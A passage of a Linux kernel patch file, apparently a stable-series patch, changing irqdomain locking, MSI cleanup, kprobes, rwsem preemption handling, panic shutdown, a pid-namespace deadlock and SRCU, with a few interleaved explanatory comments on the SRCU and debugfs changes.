+-int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+-			 irq_hw_number_t hwirq)
++static int irq_domain_associate_locked(struct irq_domain *domain, unsigned int virq,
++				       irq_hw_number_t hwirq)
+ {
+ 	struct irq_data *irq_data = irq_get_irq_data(virq);
+ 	int ret;
+@@ -573,7 +602,6 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 	if (WARN(irq_data->domain, "error: virq%i is already associated", virq))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&irq_domain_mutex);
+ 	irq_data->hwirq = hwirq;
+ 	irq_data->domain = domain;
+ 	if (domain->ops->map) {
+@@ -590,7 +618,6 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 			}
+ 			irq_data->domain = NULL;
+ 			irq_data->hwirq = 0;
+-			mutex_unlock(&irq_domain_mutex);
+ 			return ret;
+ 		}
+ 
+@@ -601,12 +628,23 @@ int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
+ 
+ 	domain->mapcount++;
+ 	irq_domain_set_mapping(domain, hwirq, irq_data);
+-	mutex_unlock(&irq_domain_mutex);
+ 
+ 	irq_clear_status_flags(virq, IRQ_NOREQUEST);
+ 
+ 	return 0;
+ }
++
++int irq_domain_associate(struct irq_domain *domain, unsigned int virq,
++			 irq_hw_number_t hwirq)
++{
++	int ret;
++
++	mutex_lock(&irq_domain_mutex);
++	ret = irq_domain_associate_locked(domain, virq, hwirq);
++	mutex_unlock(&irq_domain_mutex);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(irq_domain_associate);
+ 
+ void irq_domain_associate_many(struct irq_domain *domain, unsigned int irq_base,
+@@ -668,6 +706,34 @@ unsigned int irq_create_direct_mapping(struct irq_domain *domain)
+ EXPORT_SYMBOL_GPL(irq_create_direct_mapping);
+ #endif
+ 
++static unsigned int irq_create_mapping_affinity_locked(struct irq_domain *domain,
++						       irq_hw_number_t hwirq,
++						       const struct irq_affinity_desc *affinity)
++{
++	struct device_node *of_node = irq_domain_get_of_node(domain);
++	int virq;
++
++	pr_debug("irq_create_mapping(0x%p, 0x%lx)\n", domain, hwirq);
++
++	/* Allocate a virtual interrupt number */
++	virq = irq_domain_alloc_descs(-1, 1, hwirq, of_node_to_nid(of_node),
++				      affinity);
++	if (virq <= 0) {
++		pr_debug("-> virq allocation failed\n");
++		return 0;
++	}
++
++	if (irq_domain_associate_locked(domain, virq, hwirq)) {
++		irq_free_desc(virq);
++		return 0;
++	}
++
++	pr_debug("irq %lu on domain %s mapped to virtual irq %u\n",
++		hwirq, of_node_full_name(of_node), virq);
++
++	return virq;
++}
++
+ /**
+  * irq_create_mapping_affinity() - Map a hardware interrupt into linux irq space
+  * @domain: domain owning this hardware interrupt or NULL for default domain
+@@ -680,14 +746,11 @@ EXPORT_SYMBOL_GPL(irq_create_direct_mapping);
+  * on the number returned from that call.
+  */
+ unsigned int irq_create_mapping_affinity(struct irq_domain *domain,
+-				       irq_hw_number_t hwirq,
+-				       const struct irq_affinity_desc *affinity)
++					 irq_hw_number_t hwirq,
++					 const struct irq_affinity_desc *affinity)
+ {
+-	struct device_node *of_node;
+ 	int virq;
+ 
+-	pr_debug("irq_create_mapping(0x%p, 0x%lx)\n", domain, hwirq);
+-
+ 	/* Look for default domain if necessary */
+ 	if (domain == NULL)
+ 		domain = irq_default_domain;
+@@ -695,32 +758,19 @@ unsigned int irq_create_mapping_affinity(struct irq_domain *domain,
+ 		WARN(1, "%s(, %lx) called with NULL domain\n", __func__, hwirq);
+ 		return 0;
+ 	}
+-	pr_debug("-> using domain @%p\n", domain);
+ 
+-	of_node = irq_domain_get_of_node(domain);
++	mutex_lock(&irq_domain_mutex);
+ 
+ 	/* Check if mapping already exists */
+ 	virq = irq_find_mapping(domain, hwirq);
+ 	if (virq) {
+-		pr_debug("-> existing mapping on virq %d\n", virq);
+-		return virq;
+-	}
+-
+-	/* Allocate a virtual interrupt number */
+-	virq = irq_domain_alloc_descs(-1, 1, hwirq, of_node_to_nid(of_node),
+-				      affinity);
+-	if (virq <= 0) {
+-		pr_debug("-> virq allocation failed\n");
+-		return 0;
++		pr_debug("existing mapping on virq %d\n", virq);
++		goto out;
+ 	}
+ 
+-	if (irq_domain_associate(domain, virq, hwirq)) {
+-		irq_free_desc(virq);
+-		return 0;
+-	}
+-
+-	pr_debug("irq %lu on domain %s mapped to virtual irq %u\n",
+-		hwirq, of_node_full_name(of_node), virq);
++	virq = irq_create_mapping_affinity_locked(domain, hwirq, affinity);
++out:
++	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ }
+@@ -789,6 +839,8 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 	if (WARN_ON(type & ~IRQ_TYPE_SENSE_MASK))
+ 		type &= IRQ_TYPE_SENSE_MASK;
+ 
++	mutex_lock(&irq_domain_mutex);
++
+ 	/*
+ 	 * If we've already configured this interrupt,
+ 	 * don't do it again, or hell will break loose.
+@@ -801,7 +853,7 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 		 * interrupt number.
+ 		 */
+ 		if (type == IRQ_TYPE_NONE || type == irq_get_trigger_type(virq))
+-			return virq;
++			goto out;
+ 
+ 		/*
+ 		 * If the trigger type has not been set yet, then set
+@@ -809,40 +861,45 @@ unsigned int irq_create_fwspec_mapping(struct irq_fwspec *fwspec)
+ 		 */
+ 		if (irq_get_trigger_type(virq) == IRQ_TYPE_NONE) {
+ 			irq_data = irq_get_irq_data(virq);
+-			if (!irq_data)
+-				return 0;
++			if (!irq_data) {
++				virq = 0;
++				goto out;
++			}
+ 
+ 			irqd_set_trigger_type(irq_data, type);
+-			return virq;
++			goto out;
+ 		}
+ 
+ 		pr_warn("type mismatch, failed to map hwirq-%lu for %s!\n",
+ 			hwirq, of_node_full_name(to_of_node(fwspec->fwnode)));
+-		return 0;
++		virq = 0;
++		goto out;
+ 	}
+ 
+ 	if (irq_domain_is_hierarchy(domain)) {
+-		virq = irq_domain_alloc_irqs(domain, 1, NUMA_NO_NODE, fwspec);
+-		if (virq <= 0)
+-			return 0;
++		virq = irq_domain_alloc_irqs_locked(domain, -1, 1, NUMA_NO_NODE,
++						    fwspec, false, NULL);
++		if (virq <= 0) {
++			virq = 0;
++			goto out;
++		}
+ 	} else {
+ 		/* Create mapping */
+-		virq = irq_create_mapping(domain, hwirq);
++		virq = irq_create_mapping_affinity_locked(domain, hwirq, NULL);
+ 		if (!virq)
+-			return virq;
++			goto out;
+ 	}
+ 
+ 	irq_data = irq_get_irq_data(virq);
+-	if (!irq_data) {
+-		if (irq_domain_is_hierarchy(domain))
+-			irq_domain_free_irqs(virq, 1);
+-		else
+-			irq_dispose_mapping(virq);
+-		return 0;
++	if (WARN_ON(!irq_data)) {
++		virq = 0;
++		goto out;
+ 	}
+ 
+ 	/* Store trigger type */
+ 	irqd_set_trigger_type(irq_data, type);
++out:
++	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ }
+@@ -1102,12 +1159,15 @@ struct irq_domain *irq_domain_create_hierarchy(struct irq_domain *parent,
+ 	struct irq_domain *domain;
+ 
+ 	if (size)
+-		domain = irq_domain_create_linear(fwnode, size, ops, host_data);
++		domain = __irq_domain_create(fwnode, size, size, 0, ops, host_data);
+ 	else
+-		domain = irq_domain_create_tree(fwnode, ops, host_data);
++		domain = __irq_domain_create(fwnode, 0, ~0, 0, ops, host_data);
++
+ 	if (domain) {
+ 		domain->parent = parent;
+ 		domain->flags |= flags;
++
++		__irq_domain_publish(domain);
+ 	}
+ 
+ 	return domain;
+@@ -1426,40 +1486,12 @@ int irq_domain_alloc_irqs_hierarchy(struct irq_domain *domain,
+ 	return domain->ops->alloc(domain, irq_base, nr_irqs, arg);
+ }
+ 
+-/**
+- * __irq_domain_alloc_irqs - Allocate IRQs from domain
+- * @domain:	domain to allocate from
+- * @irq_base:	allocate specified IRQ number if irq_base >= 0
+- * @nr_irqs:	number of IRQs to allocate
+- * @node:	NUMA node id for memory allocation
+- * @arg:	domain specific argument
+- * @realloc:	IRQ descriptors have already been allocated if true
+- * @affinity:	Optional irq affinity mask for multiqueue devices
+- *
+- * Allocate IRQ numbers and initialized all data structures to support
+- * hierarchy IRQ domains.
+- * Parameter @realloc is mainly to support legacy IRQs.
+- * Returns error code or allocated IRQ number
+- *
+- * The whole process to setup an IRQ has been split into two steps.
+- * The first step, __irq_domain_alloc_irqs(), is to allocate IRQ
+- * descriptor and required hardware resources. The second step,
+- * irq_domain_activate_irq(), is to program the hardware with preallocated
+- * resources. In this way, it's easier to rollback when failing to
+- * allocate resources.
+- */
+-int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
+-			    unsigned int nr_irqs, int node, void *arg,
+-			    bool realloc, const struct irq_affinity_desc *affinity)
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity)
+ {
+ 	int i, ret, virq;
+ 
+-	if (domain == NULL) {
+-		domain = irq_default_domain;
+-		if (WARN(!domain, "domain is NULL; cannot allocate IRQ\n"))
+-			return -EINVAL;
+-	}
+-
+ 	if (realloc && irq_base >= 0) {
+ 		virq = irq_base;
+ 	} else {
+@@ -1478,24 +1510,18 @@ int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
+ 		goto out_free_desc;
+ 	}
+ 
+-	mutex_lock(&irq_domain_mutex);
+ 	ret = irq_domain_alloc_irqs_hierarchy(domain, virq, nr_irqs, arg);
+-	if (ret < 0) {
+-		mutex_unlock(&irq_domain_mutex);
++	if (ret < 0)
+ 		goto out_free_irq_data;
+-	}
+ 
+ 	for (i = 0; i < nr_irqs; i++) {
+ 		ret = irq_domain_trim_hierarchy(virq + i);
+-		if (ret) {
+-			mutex_unlock(&irq_domain_mutex);
++		if (ret)
+ 			goto out_free_irq_data;
+-		}
+ 	}
+-	
++
+ 	for (i = 0; i < nr_irqs; i++)
+ 		irq_domain_insert_irq(virq + i);
+-	mutex_unlock(&irq_domain_mutex);
+ 
+ 	return virq;
+ 
+@@ -1505,6 +1531,48 @@ out_free_desc:
+ 	irq_free_descs(virq, nr_irqs);
+ 	return ret;
+ }
++
++/**
++ * __irq_domain_alloc_irqs - Allocate IRQs from domain
++ * @domain:	domain to allocate from
++ * @irq_base:	allocate specified IRQ number if irq_base >= 0
++ * @nr_irqs:	number of IRQs to allocate
++ * @node:	NUMA node id for memory allocation
++ * @arg:	domain specific argument
++ * @realloc:	IRQ descriptors have already been allocated if true
++ * @affinity:	Optional irq affinity mask for multiqueue devices
++ *
++ * Allocate IRQ numbers and initialize all data structures to support
++ * hierarchy IRQ domains.
++ * Parameter @realloc is mainly to support legacy IRQs.
++ * Returns error code or allocated IRQ number
++ *
++ * The whole process to setup an IRQ has been split into two steps.
++ * The first step, __irq_domain_alloc_irqs(), is to allocate IRQ
++ * descriptor and required hardware resources. The second step,
++ * irq_domain_activate_irq(), is to program the hardware with preallocated
++ * resources. In this way, it's easier to rollback when failing to
++ * allocate resources.
++ */
++int __irq_domain_alloc_irqs(struct irq_domain *domain, int irq_base,
++			    unsigned int nr_irqs, int node, void *arg,
++			    bool realloc, const struct irq_affinity_desc *affinity)
++{
++	int ret;
++
++	if (domain == NULL) {
++		domain = irq_default_domain;
++		if (WARN(!domain, "domain is NULL; cannot allocate IRQ\n"))
++			return -EINVAL;
++	}
++
++	mutex_lock(&irq_domain_mutex);
++	ret = irq_domain_alloc_irqs_locked(domain, irq_base, nr_irqs, node, arg,
++					   realloc, affinity);
++	mutex_unlock(&irq_domain_mutex);
++
++	return ret;
++}
+ EXPORT_SYMBOL_GPL(__irq_domain_alloc_irqs);
+ 
+ /* The irq_data was moved, fix the revmap to refer to the new location */
+@@ -1865,6 +1933,13 @@ void irq_domain_set_info(struct irq_domain *domain, unsigned int virq,
+ 	irq_set_handler_data(virq, handler_data);
+ }
+ 
++static int irq_domain_alloc_irqs_locked(struct irq_domain *domain, int irq_base,
++					unsigned int nr_irqs, int node, void *arg,
++					bool realloc, const struct irq_affinity_desc *affinity)
++{
++	return -EINVAL;
++}
++
+ static void irq_domain_check_hierarchy(struct irq_domain *domain)
+ {
+ }
+diff --git a/kernel/irq/msi.c b/kernel/irq/msi.c
+index 783a3e6a0b107..a020bc97021f3 100644
+--- a/kernel/irq/msi.c
++++ b/kernel/irq/msi.c
+@@ -1084,10 +1084,13 @@ int msi_domain_populate_irqs(struct irq_domain *domain, struct device *dev,
+ 	struct xarray *xa;
+ 	int ret, virq;
+ 
+-	if (!msi_ctrl_valid(dev, &ctrl))
+-		return -EINVAL;
+-
+ 	msi_lock_descs(dev);
++
++	if (!msi_ctrl_valid(dev, &ctrl)) {
++		ret = -EINVAL;
++		goto unlock;
++	}
++
+ 	ret = msi_domain_add_simple_msi_descs(dev, &ctrl);
+ 	if (ret)
+ 		goto unlock;
+@@ -1109,14 +1112,35 @@ int msi_domain_populate_irqs(struct irq_domain *domain, struct device *dev,
+ 	return 0;
+ 
+ fail:
+-	for (--virq; virq >= virq_base; virq--)
++	for (--virq; virq >= virq_base; virq--) {
++		msi_domain_depopulate_descs(dev, virq, 1);
+ 		irq_domain_free_irqs_common(domain, virq, 1);
++	}
+ 	msi_domain_free_descs(dev, &ctrl);
+ unlock:
+ 	msi_unlock_descs(dev);
+ 	return ret;
+ }
+ 
++void msi_domain_depopulate_descs(struct device *dev, int virq_base, int nvec)
++{
++	struct msi_ctrl ctrl = {
++		.domid	= MSI_DEFAULT_DOMAIN,
++		.first  = virq_base,
++		.last	= virq_base + nvec - 1,
++	};
++	struct msi_desc *desc;
++	struct xarray *xa;
++	unsigned long idx;
++
++	if (!msi_ctrl_valid(dev, &ctrl))
++		return;
++
++	xa = &dev->msi.data->__domains[ctrl.domid].store;
++	xa_for_each_range(xa, idx, desc, ctrl.first, ctrl.last)
++		desc->irq = 0;
++}
++
+ /*
+  * Carefully check whether the device can use reservation mode. If
+  * reservation mode is enabled then the early activation will assign a
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 1c18ecf9f98b1..00e177de91ccd 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -458,7 +458,7 @@ static inline int kprobe_optready(struct kprobe *p)
+ }
+ 
+ /* Return true if the kprobe is disarmed. Note: p must be on hash list */
+-static inline bool kprobe_disarmed(struct kprobe *p)
++bool kprobe_disarmed(struct kprobe *p)
+ {
+ 	struct optimized_kprobe *op;
+ 
+@@ -555,17 +555,15 @@ static void do_unoptimize_kprobes(void)
+ 	/* See comment in do_optimize_kprobes() */
+ 	lockdep_assert_cpus_held();
+ 
+-	/* Unoptimization must be done anytime */
+-	if (list_empty(&unoptimizing_list))
+-		return;
++	if (!list_empty(&unoptimizing_list))
++		arch_unoptimize_kprobes(&unoptimizing_list, &freeing_list);
+ 
+-	arch_unoptimize_kprobes(&unoptimizing_list, &freeing_list);
+-	/* Loop on 'freeing_list' for disarming */
++	/* Loop on 'freeing_list' for disarming and removing from kprobe hash list */
+ 	list_for_each_entry_safe(op, tmp, &freeing_list, list) {
+ 		/* Switching from detour code to origin */
+ 		op->kp.flags &= ~KPROBE_FLAG_OPTIMIZED;
+-		/* Disarm probes if marked disabled */
+-		if (kprobe_disabled(&op->kp))
++		/* Disarm probes if marked disabled and not gone */
++		if (kprobe_disabled(&op->kp) && !kprobe_gone(&op->kp))
+ 			arch_disarm_kprobe(&op->kp);
+ 		if (kprobe_unused(&op->kp)) {
+ 			/*
+@@ -662,7 +660,7 @@ void wait_for_kprobe_optimizer(void)
+ 	mutex_unlock(&kprobe_mutex);
+ }
+ 
+-static bool optprobe_queued_unopt(struct optimized_kprobe *op)
++bool optprobe_queued_unopt(struct optimized_kprobe *op)
+ {
+ 	struct optimized_kprobe *_op;
+ 
+@@ -797,14 +795,13 @@ static void kill_optimized_kprobe(struct kprobe *p)
+ 	op->kp.flags &= ~KPROBE_FLAG_OPTIMIZED;
+ 
+ 	if (kprobe_unused(p)) {
+-		/* Enqueue if it is unused */
+-		list_add(&op->list, &freeing_list);
+ 		/*
+-		 * Remove unused probes from the hash list. After waiting
+-		 * for synchronization, this probe is reclaimed.
+-		 * (reclaiming is done by do_free_cleaned_kprobes().)
++		 * Unused kprobe is on unoptimizing or freeing list. We move it
++		 * to freeing_list and let the kprobe_optimizer() remove it from
++		 * the kprobe hash list and free it.
+ 		 */
+-		hlist_del_rcu(&op->kp.hlist);
++		if (optprobe_queued_unopt(op))
++			list_move(&op->list, &freeing_list);
+ 	}
+ 
+ 	/* Don't touch the code, because it is already freed. */
+diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c
+index e3375bc40dadc..50d4863974e7a 100644
+--- a/kernel/locking/lockdep.c
++++ b/kernel/locking/lockdep.c
+@@ -55,6 +55,7 @@
+ #include <linux/rcupdate.h>
+ #include <linux/kprobes.h>
+ #include <linux/lockdep.h>
++#include <linux/context_tracking.h>
+ 
+ #include <asm/sections.h>
+ 
+@@ -6555,6 +6556,7 @@ void lockdep_rcu_suspicious(const char *file, const int line, const char *s)
+ {
+ 	struct task_struct *curr = current;
+ 	int dl = READ_ONCE(debug_locks);
++	bool rcu = warn_rcu_enter();
+ 
+ 	/* Note: the following can be executed concurrently, so be careful. */
+ 	pr_warn("\n");
+@@ -6595,5 +6597,6 @@ void lockdep_rcu_suspicious(const char *file, const int line, const char *s)
+ 	lockdep_print_held_locks(curr);
+ 	pr_warn("\nstack backtrace:\n");
+ 	dump_stack();
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL_GPL(lockdep_rcu_suspicious);
+diff --git a/kernel/locking/rwsem.c b/kernel/locking/rwsem.c
+index 44873594de031..84d5b649b95fe 100644
+--- a/kernel/locking/rwsem.c
++++ b/kernel/locking/rwsem.c
+@@ -624,18 +624,16 @@ static inline bool rwsem_try_write_lock(struct rw_semaphore *sem,
+ 			 */
+ 			if (first->handoff_set && (waiter != first))
+ 				return false;
+-
+-			/*
+-			 * First waiter can inherit a previously set handoff
+-			 * bit and spin on rwsem if lock acquisition fails.
+-			 */
+-			if (waiter == first)
+-				waiter->handoff_set = true;
+ 		}
+ 
+ 		new = count;
+ 
+ 		if (count & RWSEM_LOCK_MASK) {
++			/*
++			 * A waiter (first or not) can set the handoff bit
++			 * if it is an RT task or has waited in the wait
++			 * queue for too long.
++			 */
+ 			if (has_handoff || (!rt_task(waiter->task) &&
+ 					    !time_after(jiffies, waiter->timeout)))
+ 				return false;
+@@ -651,11 +649,12 @@ static inline bool rwsem_try_write_lock(struct rw_semaphore *sem,
+ 	} while (!atomic_long_try_cmpxchg_acquire(&sem->count, &count, new));
+ 
+ 	/*
+-	 * We have either acquired the lock with handoff bit cleared or
+-	 * set the handoff bit.
++	 * We have either acquired the lock with handoff bit cleared or set
++	 * the handoff bit. Only the first waiter can have its handoff_set
++	 * set here to enable optimistic spinning in the slowpath loop.
+ 	 */
+ 	if (new & RWSEM_FLAG_HANDOFF) {
+-		waiter->handoff_set = true;
++		first->handoff_set = true;
+ 		lockevent_inc(rwsem_wlock_handoff);
+ 		return false;
+ 	}
+@@ -1092,7 +1091,7 @@ queue:
+ 			/* Ordered by sem->wait_lock against rwsem_mark_wake(). */
+ 			break;
+ 		}
+-		schedule();
++		schedule_preempt_disabled();
+ 		lockevent_inc(rwsem_sleep_reader);
+ 	}
+ 
+@@ -1254,14 +1253,20 @@ static struct rw_semaphore *rwsem_downgrade_wake(struct rw_semaphore *sem)
+  */
+ static inline int __down_read_common(struct rw_semaphore *sem, int state)
+ {
++	int ret = 0;
+ 	long count;
+ 
++	preempt_disable();
+ 	if (!rwsem_read_trylock(sem, &count)) {
+-		if (IS_ERR(rwsem_down_read_slowpath(sem, count, state)))
+-			return -EINTR;
++		if (IS_ERR(rwsem_down_read_slowpath(sem, count, state))) {
++			ret = -EINTR;
++			goto out;
++		}
+ 		DEBUG_RWSEMS_WARN_ON(!is_rwsem_reader_owned(sem), sem);
+ 	}
+-	return 0;
++out:
++	preempt_enable();
++	return ret;
+ }
+ 
+ static inline void __down_read(struct rw_semaphore *sem)
+@@ -1281,19 +1286,23 @@ static inline int __down_read_killable(struct rw_semaphore *sem)
+ 
+ static inline int __down_read_trylock(struct rw_semaphore *sem)
+ {
++	int ret = 0;
+ 	long tmp;
+ 
+ 	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);
+ 
++	preempt_disable();
+ 	tmp = atomic_long_read(&sem->count);
+ 	while (!(tmp & RWSEM_READ_FAILED_MASK)) {
+ 		if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
+ 						    tmp + RWSEM_READER_BIAS)) {
+ 			rwsem_set_reader_owned(sem);
+-			return 1;
++			ret = 1;
++			break;
+ 		}
+ 	}
+-	return 0;
++	preempt_enable();
++	return ret;
+ }
+ 
+ /*
+@@ -1335,6 +1344,7 @@ static inline void __up_read(struct rw_semaphore *sem)
+ 	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);
+ 	DEBUG_RWSEMS_WARN_ON(!is_rwsem_reader_owned(sem), sem);
+ 
++	preempt_disable();
+ 	rwsem_clear_reader_owned(sem);
+ 	tmp = atomic_long_add_return_release(-RWSEM_READER_BIAS, &sem->count);
+ 	DEBUG_RWSEMS_WARN_ON(tmp < 0, sem);
+@@ -1343,6 +1353,7 @@ static inline void __up_read(struct rw_semaphore *sem)
+ 		clear_nonspinnable(sem);
+ 		rwsem_wake(sem);
+ 	}
++	preempt_enable();
+ }
+ 
+ /*
+@@ -1662,6 +1673,12 @@ void down_read_non_owner(struct rw_semaphore *sem)
+ {
+ 	might_sleep();
+ 	__down_read(sem);
++	/*
++	 * The owner value for a reader-owned lock is mostly for debugging
++	 * purposes only and is not critical to the correct functioning of
++	 * rwsem. So it is perfectly fine to set it in a preempt-enabled
++	 * context here.
++	 */
+ 	__rwsem_set_reader_owned(sem, NULL);
+ }
+ EXPORT_SYMBOL(down_read_non_owner);
+diff --git a/kernel/panic.c b/kernel/panic.c
+index 463c9295bc28a..5cfea8302d23a 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -34,6 +34,7 @@
+ #include <linux/ratelimit.h>
+ #include <linux/debugfs.h>
+ #include <linux/sysfs.h>
++#include <linux/context_tracking.h>
+ #include <trace/events/error_report.h>
+ #include <asm/sections.h>
+ 
+@@ -211,9 +212,6 @@ static void panic_print_sys_info(bool console_flush)
+ 		return;
+ 	}
+ 
+-	if (panic_print & PANIC_PRINT_ALL_CPU_BT)
+-		trigger_all_cpu_backtrace();
+-
+ 	if (panic_print & PANIC_PRINT_TASK_INFO)
+ 		show_state();
+ 
+@@ -243,6 +241,30 @@ void check_panic_on_warn(const char *origin)
+ 		      origin, limit);
+ }
+ 
++/*
++ * Helper that triggers the NMI backtrace (if set in panic_print)
++ * and then performs the secondary CPUs shutdown - we cannot have
++ * the NMI backtrace after the CPUs are off!
++ */
++static void panic_other_cpus_shutdown(bool crash_kexec)
++{
++	if (panic_print & PANIC_PRINT_ALL_CPU_BT)
++		trigger_all_cpu_backtrace();
++
++	/*
++	 * Note that smp_send_stop() is the usual SMP shutdown function,
++	 * which unfortunately may not be hardened to work in a panic
++	 * situation. If we want to do crash dump after notifier calls
++	 * and kmsg_dump, we will need architecture dependent extra
++	 * bits in addition to stopping other CPUs, hence we rely on
++	 * crash_smp_send_stop() for that.
++	 */
++	if (!crash_kexec)
++		smp_send_stop();
++	else
++		crash_smp_send_stop();
++}
++
+ /**
+  *	panic - halt the system
+  *	@fmt: The text string to print
+@@ -333,23 +355,10 @@ void panic(const char *fmt, ...)
+ 	 *
+ 	 * Bypass the panic_cpu check and call __crash_kexec directly.
+ 	 */
+-	if (!_crash_kexec_post_notifiers) {
++	if (!_crash_kexec_post_notifiers)
+ 		__crash_kexec(NULL);
+ 
+-		/*
+-		 * Note smp_send_stop is the usual smp shutdown function, which
+-		 * unfortunately means it may not be hardened to work in a
+-		 * panic situation.
+-		 */
+-		smp_send_stop();
+-	} else {
+-		/*
+-		 * If we want to do crash dump after notifier calls and
+-		 * kmsg_dump, we will need architecture dependent extra
+-		 * works in addition to stopping other CPUs.
+-		 */
+-		crash_smp_send_stop();
+-	}
++	panic_other_cpus_shutdown(_crash_kexec_post_notifiers);
+ 
+ 	/*
+ 	 * Run any panic handlers, including those that might need to
+@@ -679,6 +688,7 @@ void __warn(const char *file, int line, void *caller, unsigned taint,
+ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 		       const char *fmt, ...)
+ {
++	bool rcu = warn_rcu_enter();
+ 	struct warn_args args;
+ 
+ 	pr_warn(CUT_HERE);
+@@ -693,11 +703,13 @@ void warn_slowpath_fmt(const char *file, int line, unsigned taint,
+ 	va_start(args.args, fmt);
+ 	__warn(file, line, __builtin_return_address(0), taint, NULL, &args);
+ 	va_end(args.args);
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL(warn_slowpath_fmt);
+ #else
+ void __warn_printk(const char *fmt, ...)
+ {
++	bool rcu = warn_rcu_enter();
+ 	va_list args;
+ 
+ 	pr_warn(CUT_HERE);
+@@ -705,6 +717,7 @@ void __warn_printk(const char *fmt, ...)
+ 	va_start(args, fmt);
+ 	vprintk(fmt, args);
+ 	va_end(args);
++	warn_rcu_exit(rcu);
+ }
+ EXPORT_SYMBOL(__warn_printk);
+ #endif
+diff --git a/kernel/pid_namespace.c b/kernel/pid_namespace.c
+index f4f8cb0435b45..fc21c5d5fd5de 100644
+--- a/kernel/pid_namespace.c
++++ b/kernel/pid_namespace.c
+@@ -244,7 +244,24 @@ void zap_pid_ns_processes(struct pid_namespace *pid_ns)
+ 		set_current_state(TASK_INTERRUPTIBLE);
+ 		if (pid_ns->pid_allocated == init_pids)
+ 			break;
++		/*
++		 * Release tasks_rcu_exit_srcu to avoid the following deadlock:
++		 *
++		 * 1) TASK A unshare(CLONE_NEWPID)
++		 * 2) TASK A fork() twice -> TASK B (child reaper for new ns)
++		 *    and TASK C
++		 * 3) TASK B exits, kills TASK C, waits for TASK A to reap it
++		 * 4) TASK A calls synchronize_rcu_tasks()
++		 *                   -> synchronize_srcu(tasks_rcu_exit_srcu)
++		 * 5) *DEADLOCK*
++		 *
++		 * It is considered safe to release tasks_rcu_exit_srcu here
++		 * because we assume the current task cannot be concurrently
++		 * reaped at this point.
++		 */
++		exit_tasks_rcu_stop();
+ 		schedule();
++		exit_tasks_rcu_start();
+ 	}
+ 	__set_current_state(TASK_RUNNING);
+ 
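The exit_tasks_rcu_stop()/exit_tasks_rcu_start() pair above releases the
tasks-RCU SRCU read side across the sleep so that step 4 of the deadlock
can make progress. A minimal sketch of the general idiom of dropping an
SRCU reader around a blocking wait (my_srcu and condition_met() are
hypothetical stand-ins, not the tasks-RCU API):

	int idx = srcu_read_lock(&my_srcu);

	while (!condition_met()) {
		set_current_state(TASK_INTERRUPTIBLE);
		srcu_read_unlock(&my_srcu, idx);	/* let grace periods elapse */
		schedule();
		idx = srcu_read_lock(&my_srcu);		/* re-enter the read side */
	}
	__set_current_state(TASK_RUNNING);
	srcu_read_unlock(&my_srcu, idx);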
+diff --git a/kernel/power/energy_model.c b/kernel/power/energy_model.c
+index f82111837b8d1..7b44f5b89fa15 100644
+--- a/kernel/power/energy_model.c
++++ b/kernel/power/energy_model.c
+@@ -87,10 +87,7 @@ static void em_debug_create_pd(struct device *dev)
+ 
+ static void em_debug_remove_pd(struct device *dev)
+ {
+-	struct dentry *debug_dir;
+-
+-	debug_dir = debugfs_lookup(dev_name(dev), rootdir);
+-	debugfs_remove_recursive(debug_dir);
++	debugfs_lookup_and_remove(dev_name(dev), rootdir);
+ }
+ 
+ static int __init em_debug_init(void)
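The same substitution recurs below in test_udelay.c and blktrace.c:
debugfs_lookup() takes a reference on the dentry it returns, and feeding
it straight to debugfs_remove() leaks that reference. The combined
helper does the lookup, the removal, and the reference drop in one call.
Sketch of the before/after ("node" and parent are illustrative):

	/* before: leaks the dentry reference taken by the lookup */
	debugfs_remove(debugfs_lookup("node", parent));

	/* after: look up, remove, and drop the reference in one helper */
	debugfs_lookup_and_remove("node", parent);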
+diff --git a/kernel/rcu/srcutree.c b/kernel/rcu/srcutree.c
+index ca4b5dcec675b..16953784a0bdf 100644
+--- a/kernel/rcu/srcutree.c
++++ b/kernel/rcu/srcutree.c
+@@ -726,7 +726,7 @@ static void srcu_gp_start(struct srcu_struct *ssp)
+ 	int state;
+ 
+ 	if (smp_load_acquire(&ssp->srcu_size_state) < SRCU_SIZE_WAIT_BARRIER)
+-		sdp = per_cpu_ptr(ssp->sda, 0);
++		sdp = per_cpu_ptr(ssp->sda, get_boot_cpu_id());
+ 	else
+ 		sdp = this_cpu_ptr(ssp->sda);
+ 	lockdep_assert_held(&ACCESS_PRIVATE(ssp, lock));
+@@ -837,7 +837,8 @@ static void srcu_gp_end(struct srcu_struct *ssp)
+ 	/* Initiate callback invocation as needed. */
+ 	ss_state = smp_load_acquire(&ssp->srcu_size_state);
+ 	if (ss_state < SRCU_SIZE_WAIT_BARRIER) {
+-		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, 0), cbdelay);
++		srcu_schedule_cbs_sdp(per_cpu_ptr(ssp->sda, get_boot_cpu_id()),
++					cbdelay);
+ 	} else {
+ 		idx = rcu_seq_ctr(gpseq) % ARRAY_SIZE(snp->srcu_have_cbs);
+ 		srcu_for_each_node_breadth_first(ssp, snp) {
+@@ -1161,7 +1162,7 @@ static unsigned long srcu_gp_start_if_needed(struct srcu_struct *ssp,
+ 	idx = __srcu_read_lock_nmisafe(ssp);
+ 	ss_state = smp_load_acquire(&ssp->srcu_size_state);
